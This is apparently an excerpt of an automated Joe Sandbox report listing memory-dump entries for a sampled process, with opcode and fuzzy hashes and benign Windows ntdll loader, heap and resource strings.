                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                      • Opcode ID: 7ad957a6ddfa2328242865a009938717c0a969a292b5891b546aef7f63119b52
                                                                                                                                      • Instruction ID: 515551e72b75263d22839e63a3f66520b497d35c1be44e7a3bc294a6555e2155
                                                                                                                                      • Opcode Fuzzy Hash: 7ad957a6ddfa2328242865a009938717c0a969a292b5891b546aef7f63119b52
                                                                                                                                      • Instruction Fuzzy Hash: 88A17D719416299BEB31EF24CD88BEAB7B8EF44710F1041E9E948A7250D7399F84CF50
                                                                                                                                      Strings
                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0102A10F
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0102A121
                                                                                                                                      • LdrpCheckModule, xrefs: 0102A117
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-161242083
                                                                                                                                      • Opcode ID: ce38405dfa0a3b1738b68895dc73e450d94d32b33c06f5bbb1da06a1de571964
                                                                                                                                      • Instruction ID: 5c9482dcfef33f92b28b5b19a3d8df7e7bdbc2c0acfcd660f127ea539cc97ff7
                                                                                                                                      • Opcode Fuzzy Hash: ce38405dfa0a3b1738b68895dc73e450d94d32b33c06f5bbb1da06a1de571964
                                                                                                                                      • Instruction Fuzzy Hash: 4A710071A00205DFCB24DF69CD81BAEB7F4FB44704F28456DE882EB641DA79AD81DB50
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                      • Opcode ID: 0943412831b1be7d2ff69a63b9270db7b14851675f21c01e126cf845b4242002
                                                                                                                                      • Instruction ID: eb0d316410925471a5a50e407d8f39cbe19dace627dc1f8dcd050352d6fe23b8
                                                                                                                                      • Opcode Fuzzy Hash: 0943412831b1be7d2ff69a63b9270db7b14851675f21c01e126cf845b4242002
                                                                                                                                      • Instruction Fuzzy Hash: DA61D1316043019FDB29CF28C880BAABBE2FF45714F18855AE489CF382CB74E841DB95
                                                                                                                                      Strings
                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 010382D7
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010382E8
                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 010382DE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                      • Opcode ID: f0f360ebf8990e25b122c21f267d95e6f9839554876d4becd49bf49992c3033a
                                                                                                                                      • Instruction ID: 6568665a033f6e9568b016d774c46e3e30fbde1a55ead803517630f91001691e
                                                                                                                                      • Opcode Fuzzy Hash: f0f360ebf8990e25b122c21f267d95e6f9839554876d4becd49bf49992c3033a
                                                                                                                                      • Instruction Fuzzy Hash: 1A41F6B2544318ABC730EB65DD81FAB77E8EF48750F04452AFA84D72A1E779D800ABD1
                                                                                                                                      Strings
                                                                                                                                      • PreferredUILanguages, xrefs: 0107C212
                                                                                                                                      • @, xrefs: 0107C1F1
                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0107C1C5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                      • Opcode ID: bb33097c69ef1b50853e5e836de7e63ef7c50df5a2959d229d3c85f1bd8f8a8b
                                                                                                                                      • Instruction ID: 7594e4812b7347b56dcb9692fd6958f74c09397936dcb00b23cd2ebf2d1efae3
                                                                                                                                      • Opcode Fuzzy Hash: bb33097c69ef1b50853e5e836de7e63ef7c50df5a2959d229d3c85f1bd8f8a8b
                                                                                                                                      • Instruction Fuzzy Hash: B5416171E0020AEBEB51DED8C945FEEBBF9AB14700F14406AE649F7280E7749E458B54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                      • Opcode ID: 10a6489382d1b5d06afe06e832fa3fa5353c8f424f63e8cca9f3182d0d5e41fe
                                                                                                                                      • Instruction ID: 2f2a01e16debe29876acf196ba0010f8316127fa9c66eb523d79cd5f2cca17b0
                                                                                                                                      • Opcode Fuzzy Hash: 10a6489382d1b5d06afe06e832fa3fa5353c8f424f63e8cca9f3182d0d5e41fe
                                                                                                                                      • Instruction Fuzzy Hash: F041F471A042588BEB61DB99C844BEEBBF5EF55380F14049ADD81EB781E7748981CB11
                                                                                                                                      Strings
                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01044888
                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01044899
                                                                                                                                      • LdrpCheckRedirection, xrefs: 0104488F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                      • Opcode ID: 108b58c7e173f3cc7a0c5a49e9eca6f79a5706a969f3489a384587b4bb828a83
                                                                                                                                      • Instruction ID: a4fcdd4924ff88fe2c52b7faf3aac4361c9624e3c81814934a0fa2738c669847
                                                                                                                                      • Opcode Fuzzy Hash: 108b58c7e173f3cc7a0c5a49e9eca6f79a5706a969f3489a384587b4bb828a83
                                                                                                                                      • Instruction Fuzzy Hash: 2E41A1B2A047519FEB61CE68D8C0B6A7BE4FF49A50B0505BDEDC8D7252E731E801CB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                      • API String ID: 0-2558761708
                                                                                                                                      • Opcode ID: bef184a742fdf567875f3048feb1ca479272294f3be7a847fedee5328910d0ec
                                                                                                                                      • Instruction ID: d16dccc8599b76d9658df41f1a1bb20ed2bf320edda1034a4fb6cfa714e229ea
                                                                                                                                      • Opcode Fuzzy Hash: bef184a742fdf567875f3048feb1ca479272294f3be7a847fedee5328910d0ec
                                                                                                                                      • Instruction Fuzzy Hash: 661102313181119FEB29C614CC41BB9F3A5EF80B29F18815BE486CB291DF34D840D755
                                                                                                                                      Strings
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01042104
                                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 010420F3
                                                                                                                                      • LdrpInitializationFailure, xrefs: 010420FA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-2986994758
                                                                                                                                      • Opcode ID: beb351924e43121c5015f48ab5ed6ffe0778d64c8cc605cabf22008982db8a96
                                                                                                                                      • Instruction ID: de4014ada4ab8a98d606236275b38105fbe04bf0813a9e613438ac4fef2a0893
                                                                                                                                      • Opcode Fuzzy Hash: beb351924e43121c5015f48ab5ed6ffe0778d64c8cc605cabf22008982db8a96
                                                                                                                                      • Instruction Fuzzy Hash: 2BF0C8B57803087BE724D64CDC82FD537A8FB55B54F500065F7807B2C5D1B4A940D651
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: #%u
                                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                                      • Opcode ID: d3da99ab21d50bc5a4fe1e44323c2f25c626d1ca504e1524d18301736c64120c
                                                                                                                                      • Instruction ID: c5b2bf735eb3a6935ca56086e7d6fbaf6b08a7f542b1e8eca485e027daff341c
                                                                                                                                      • Opcode Fuzzy Hash: d3da99ab21d50bc5a4fe1e44323c2f25c626d1ca504e1524d18301736c64120c
                                                                                                                                      • Instruction Fuzzy Hash: 26714B71A0014A9FDB01DFA8C991FEEB7F9AF08704F144066EA45E7251EA78EE01DB61
                                                                                                                                      Strings
                                                                                                                                      • LdrResSearchResource Exit, xrefs: 00FCAA25
                                                                                                                                      • LdrResSearchResource Enter, xrefs: 00FCAA13
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                      • API String ID: 0-4066393604
                                                                                                                                      • Opcode ID: fe11f061754db16b09bbe1c2cb23e5cf0838022c94ef7e383345fd210b92abb5
                                                                                                                                      • Instruction ID: 5e9d290689a58b9f762dd09c5d31c5d5b26309aa61fbbd3bf83d722b82c86d2a
                                                                                                                                      • Opcode Fuzzy Hash: fe11f061754db16b09bbe1c2cb23e5cf0838022c94ef7e383345fd210b92abb5
                                                                                                                                      • Instruction Fuzzy Hash: C7E17271E0021ADBEB21DE98CA81FEEB7B9BF48318F144169F941E7251D738AD40EB51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: `$`
                                                                                                                                      • API String ID: 0-197956300
                                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                      • Instruction ID: 429fa6dd090321d5076aa32cf331c4bcbdbbe77ae873f6d61d42cce119155d75
                                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                      • Instruction Fuzzy Hash: F0C1BE31308342DBEB25EE28C841B6BBBE5AFC4318F084A2EF6D68B690D775D545CB51
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                      • Opcode ID: d5580a19e24038e9dc4ea28344f5883c4a5792e09b27ddc311892d9189e17826
                                                                                                                                      • Instruction ID: 06d371cd0fb60ff826449f16ec9bb15b62f389c74cbf3490283074ee85c32b0d
                                                                                                                                      • Opcode Fuzzy Hash: d5580a19e24038e9dc4ea28344f5883c4a5792e09b27ddc311892d9189e17826
                                                                                                                                      • Instruction Fuzzy Hash: 91615D71E007199FDB15DFA8C940BAEBBF9FB84700F14416EE689EB291D731A900CB50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$MUI
                                                                                                                                      • API String ID: 0-17815947
                                                                                                                                      • Opcode ID: d41210a031415a679b9740282be5e968e025f1f8683d5cfb90e04c273f779f6c
                                                                                                                                      • Instruction ID: 316788d79b2860b86e474a9f575b6465a6d70c524967f2321924e9799cd67da0
                                                                                                                                      • Opcode Fuzzy Hash: d41210a031415a679b9740282be5e968e025f1f8683d5cfb90e04c273f779f6c
                                                                                                                                      • Instruction Fuzzy Hash: F5514671E0021DAEEB11DFA9CC85AEEBBBCAB04754F10012AE641E7291DB359E05CB60
                                                                                                                                      Strings
                                                                                                                                      • kLsE, xrefs: 00FC0540
                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FC063D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                      • API String ID: 0-2547482624
                                                                                                                                      • Opcode ID: 70ff3671484610ff9314919756433a1c2c377e26a782f30ae58b03c77e63594f
                                                                                                                                      • Instruction ID: a0956b500802f25cb95c075f44434dbfe2dae395f0406e086a4c9280cedf466b
                                                                                                                                      • Opcode Fuzzy Hash: 70ff3671484610ff9314919756433a1c2c377e26a782f30ae58b03c77e63594f
                                                                                                                                      • Instruction Fuzzy Hash: D851AC71904747CBC724DF24C642BA3B7E4AF84314F04483EE99A87240EB34A946EF92
                                                                                                                                      Strings
                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 00FCA2FB
                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 00FCA309
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                      • Opcode ID: 348d80dba4c90075bfc90a2d219c3a7d921f9bd33444ae8f4c772b71a19b60d8
                                                                                                                                      • Instruction ID: 4a5a059efa9aac038e5a89e7d48d92eae0fce249642caa4427b9de80f2022f7a
                                                                                                                                      • Opcode Fuzzy Hash: 348d80dba4c90075bfc90a2d219c3a7d921f9bd33444ae8f4c772b71a19b60d8
                                                                                                                                      • Instruction Fuzzy Hash: EE41D031A0069ADBDB12CFA9C951FAD77F4FF84714F2440A9E940DB291E376E940EB42
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                      • Opcode ID: 9025494190a011fbb5ec2ff2edfe1e34829530b830274c87fa4d229bd2316bf7
                                                                                                                                      • Instruction ID: a285fe4d0a54655dc1f0009374e19882d47f973f8c8d70b004c671a92dc4e9a6
                                                                                                                                      • Opcode Fuzzy Hash: 9025494190a011fbb5ec2ff2edfe1e34829530b830274c87fa4d229bd2316bf7
                                                                                                                                      • Instruction Fuzzy Hash: 5701D1B2250704AFE312DF24CD85B2677E8EB44B15F048939A64CC72A0E734D804EB46
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: MUI
                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                      • Opcode ID: 9c534096d770fe82b93b297d0f0230b603139153f94698d1acbebd6a3b509e01
                                                                                                                                      • Instruction ID: e12b80ba3914070a68aba52c662449f4014d2c91e7b6dc57a5119fa5f7b1fc94
                                                                                                                                      • Opcode Fuzzy Hash: 9c534096d770fe82b93b297d0f0230b603139153f94698d1acbebd6a3b509e01
                                                                                                                                      • Instruction Fuzzy Hash: 8B826E75E0021A8FDB24CFA9CA82BEDB7B5BF48710F14816DE859AB290D7349D41EF50
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 1031662f8166bef555a2321829cf2f82fd093a312e556781b5696bad13f27227
                                                                                                                                      • Instruction ID: 4dbc7b38043716b64555c8e7e277798fa09b6f76c392547afe4af55d1a9c82cf
                                                                                                                                      • Opcode Fuzzy Hash: 1031662f8166bef555a2321829cf2f82fd093a312e556781b5696bad13f27227
                                                                                                                                      • Instruction Fuzzy Hash: 289161B1A00219AFEB21DF95CC85FAE7BB9EF49B50F140065F600AB191E775AD00DBA0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 35ceff7239a33bd164e43c6d9a48402293efaa1996ab4b7856415089b1299b34
                                                                                                                                      • Instruction ID: 2cd3790ffda19975f9a0f64c679b14375d0693e091a723542dbd43c8d747c43f
                                                                                                                                      • Opcode Fuzzy Hash: 35ceff7239a33bd164e43c6d9a48402293efaa1996ab4b7856415089b1299b34
                                                                                                                                      • Instruction Fuzzy Hash: C491BE75900609AEDB22EFA4DC44FEFBBBEEF85740F100029F640AB251DB399901DB90
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: GlobalTags
                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                      • Opcode ID: 7401b7c972a486c881a08c691977856b344e057002df5a45de99946b6994f0e5
                                                                                                                                      • Instruction ID: b0e9986ad3a4a5b77f5c2d4e85f0c037eddeb815ba8441f164f4f3d033e2d973
                                                                                                                                      • Opcode Fuzzy Hash: 7401b7c972a486c881a08c691977856b344e057002df5a45de99946b6994f0e5
                                                                                                                                      • Instruction Fuzzy Hash: DB719EB5E0020AAFDF69CF98C5906EDBBF5BF88710F14816AE585A7241E7768A01CB50
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .mui
                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                      • Opcode ID: c5fd42254bb8534369e4140b4704b935d007ad43c84b852fa5f420aa8228e3c4
                                                                                                                                      • Instruction ID: 44f63c81f60777b05453b51eed631401cbb4cfc0db061e485efef62d306d1110
                                                                                                                                      • Opcode Fuzzy Hash: c5fd42254bb8534369e4140b4704b935d007ad43c84b852fa5f420aa8228e3c4
                                                                                                                                      • Instruction Fuzzy Hash: CD51A372D00229ABDF15DF99D940AAEBBB9EF04B14F05416AFA51FB240D7389D01CBA4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: EXT-
                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                      • Opcode ID: 6cbdca698f43a22d678cb92686551d6a99f4522f32aa1936f7a0e22e2d3b8e6a
                                                                                                                                      • Instruction ID: 0d77fc98555e311e833b2f8c69e82677f6c1cd12bc227b169bc0fafe3a39fa4d
                                                                                                                                      • Opcode Fuzzy Hash: 6cbdca698f43a22d678cb92686551d6a99f4522f32aa1936f7a0e22e2d3b8e6a
                                                                                                                                      • Instruction Fuzzy Hash: 7241B3729083129BD710EB75CC41B6BB7E9AF88B14F48092EF594DB280E678D904E793
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: BinaryHash
                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                      • Opcode ID: 33db402706157ed7ee83985453f76c5d26c0de1fe536afb847510fb532b60ac1
                                                                                                                                      • Instruction ID: 3c839d1be9fa72e7f1e88093485b5c40d73105f77d538bbe23a0d0c0d2c85061
                                                                                                                                      • Opcode Fuzzy Hash: 33db402706157ed7ee83985453f76c5d26c0de1fe536afb847510fb532b60ac1
                                                                                                                                      • Instruction Fuzzy Hash: 224121B1D0052DABEB21DB50CD84FDEB77CAB45714F0045A6AB48BB181DB709F898FA4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #
                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                      • Opcode ID: 0f8f8bd5d48be64811cbff84e57be8ba39bf7f533be7951ba9346d38374c42e0
                                                                                                                                      • Instruction ID: 16295aa5fb0355eb612c6c7180d33b617a06fc15bdab80f2bd43652e3e155a29
                                                                                                                                      • Opcode Fuzzy Hash: 0f8f8bd5d48be64811cbff84e57be8ba39bf7f533be7951ba9346d38374c42e0
                                                                                                                                      • Instruction Fuzzy Hash: 89310931A0070D9BEB62DB69C850BFF7BE8DF44704F944068EE81AB282C776E905CB50
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: BinaryName
                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                      • Opcode ID: 2c50793f18289c4e9de3b58d3f966902e25243d2faca15945d1e3e075175768e
                                                                                                                                      • Instruction ID: e8bd56408d4156a97958ed399c175d0680a12bea19cca0a23658dc61f7ced28d
                                                                                                                                      • Opcode Fuzzy Hash: 2c50793f18289c4e9de3b58d3f966902e25243d2faca15945d1e3e075175768e
                                                                                                                                      • Instruction Fuzzy Hash: 34310536900515AFFB1ADB59CA45EAFBBB8EBC0750F01416AA941F7251D7309E00D7E0
                                                                                                                                      Strings
                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0104895E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                      • Opcode ID: e82f13e3bb85468b4ada897f4b254e024ef309a7835910ef9bf334b89403a915
                                                                                                                                      • Instruction ID: e67d5e2b52f6d1d93cbf06535e333aae06f0c474fc095f187cec61d3fb3519e1
                                                                                                                                      • Opcode Fuzzy Hash: e82f13e3bb85468b4ada897f4b254e024ef309a7835910ef9bf334b89403a915
                                                                                                                                      • Instruction Fuzzy Hash: 7D0147F5200A019FE6296F95CCC4E9A7BA5EF86354B0C087EF7C106152CB25AC40C792
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
